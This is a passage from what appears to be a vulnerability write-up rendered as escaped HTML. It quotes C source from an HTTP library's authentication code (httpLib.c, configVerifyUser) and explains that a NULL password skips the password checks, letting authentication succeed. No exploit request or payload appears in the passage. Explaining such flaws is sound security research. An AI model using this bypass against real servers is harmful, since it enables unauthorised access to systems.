<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-31\"><span class=\"crayon-cn\">1716<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-32\"><span class=\"crayon-cn\">1717<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">verifyUser<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-33\"><span class=\"crayon-cn\">1718<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-34\"><span class=\"crayon-cn\">1719<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-35\"><span class=\"crayon-cn\">1720<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">flags<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">HTTP_AUTH_NO_SESSION<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">store<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">noSession<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-36\"><span class=\"crayon-cn\">1721<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpCreateSession<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-37\"><span class=\"crayon-cn\">1722<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* Too many sessions *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-38\"><span class=\"crayon-cn\">1723<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-39\"><span class=\"crayon-cn\">1724<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-40\"><span class=\"crayon-cn\">1725<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpSetSessionVar<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">HTTP_SESSION_USERNAME<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-41\"><span class=\"crayon-cn\">1726<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpSetSessionVar<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">HTTP_SESSION_IP<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-42\"><span class=\"crayon-cn\">1727<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-43\"><span class=\"crayon-cn\">1728<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">authenticated<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5aa9a042c3985105449381-44\"><span class=\"crayon-cn\">1729<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">authenticateProbed<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-45\"><span class=\"crayon-cn\">1730<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sclone<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-46\"><span class=\"crayon-cn\">1731<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">encoded<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-47\"><span class=\"crayon-cn\">1732<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-48\"><span class=\"crayon-cn\">1733<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-49\"><span 
class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-50\"><em>File http\/httpLib.c \u2013 function configVerifyUser()<\/em><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-51\">The following function first checks for the presence of a valid user, either one already set in the session or one passed with the request. Since we are able to pass a NULL password (line 2031), the actual password checks are skipped and authentication succeeds on reaching line 2055.<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-52\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-53\"><span class=\"crayon-cn\">2014<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/*<\/span><\/div>\n<div
class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-54\"><span class=\"crayon-c\">2015 Verify the user password for the &#8220;config&#8221; store based on the users defined via configuration directives.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-55\"><span class=\"crayon-c\">2016 Password may be NULL only if using auto-login.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-56\"><span class=\"crayon-c\">2017 *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-57\"><span class=\"crayon-cn\">2018<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">bool<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">configVerifyUser<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">HttpConn *<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cchar *<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cchar *<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-58\"><span class=\"crayon-cn\">2019<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-59\"><span class=\"crayon-cn\">2020<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpRx *<\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-60\"><span class=\"crayon-cn\">2021<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpAuth 
*<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-61\"><span class=\"crayon-cn\">2022<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">bool<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">success<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-62\"><span class=\"crayon-cn\">2023<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">requiredPassword<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-63\"><span class=\"crayon-cn\">2024<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-64\"><span class=\"crayon-cn\">2025<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-65\"><span class=\"crayon-cn\">2026<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">route<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-66\"><span class=\"crayon-cn\">2027<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mprLookupKey<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">userCache<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-67\"><span class=\"crayon-cn\">2028<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;auth.login.error&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;error&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;msg: &#8216;Unknown user&#8217;, username:&#8217;%s'&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-68\"><span class=\"crayon-cn\">2029<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-69\"><span class=\"crayon-cn\">2030<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-70\"><span class=\"crayon-cn\">2031<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-71\"><span class=\"crayon-cn\">2032<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">realm<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">realm<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\u0000&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-72\"><span class=\"crayon-cn\">2033<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mprLog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;error http auth&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;No AuthRealm defined&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-73\"><span class=\"crayon-cn\">2034<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-74\"><span class=\"crayon-cn\">2035<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requiredPassword<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">passwordDigest<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">passwordDigest<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-75\"><span 
class=\"crayon-cn\">2036<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">sncmp<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">requiredPassword<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;BF&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">slen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">requiredPassword<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">isdigit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">requiredPassword<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-76\"><span class=\"crayon-cn\">2037<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requiredPassword<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-s\">&#8216;:&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-77\"><span class=\"crayon-cn\">2038<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* Blowifsh *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-78\"><span class=\"crayon-cn\">2039<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">success<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mprCheckPassword<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">sfmt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;%s:%s:%s&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">realm<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-79\"><span class=\"crayon-cn\">2040<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-80\"><span class=\"crayon-cn\">2041<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-81\"><span class=\"crayon-cn\">2042<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">encoded<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-82\"><span class=\"crayon-cn\">2043<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mprGetMD5<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">sfmt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;%s:%s:%s&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">realm<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-83\"><span class=\"crayon-cn\">2044<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">encoded<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-84\"><span class=\"crayon-cn\">2045<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-85\"><span class=\"crayon-cn\">2046<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">success<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">smatch<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requiredPassword<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-86\"><span class=\"crayon-cn\">2047<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-87\"><span class=\"crayon-cn\">2048<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">success<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-88\"><span class=\"crayon-cn\">2049<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;auth.login.authenticated&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-s\">&#8220;context&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;msg:&#8217;User authenticated&#8217;, username:&#8217;%s'&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-89\"><span class=\"crayon-cn\">2050<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-90\"><span class=\"crayon-cn\">2051<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;auth.login.error&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;error&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span 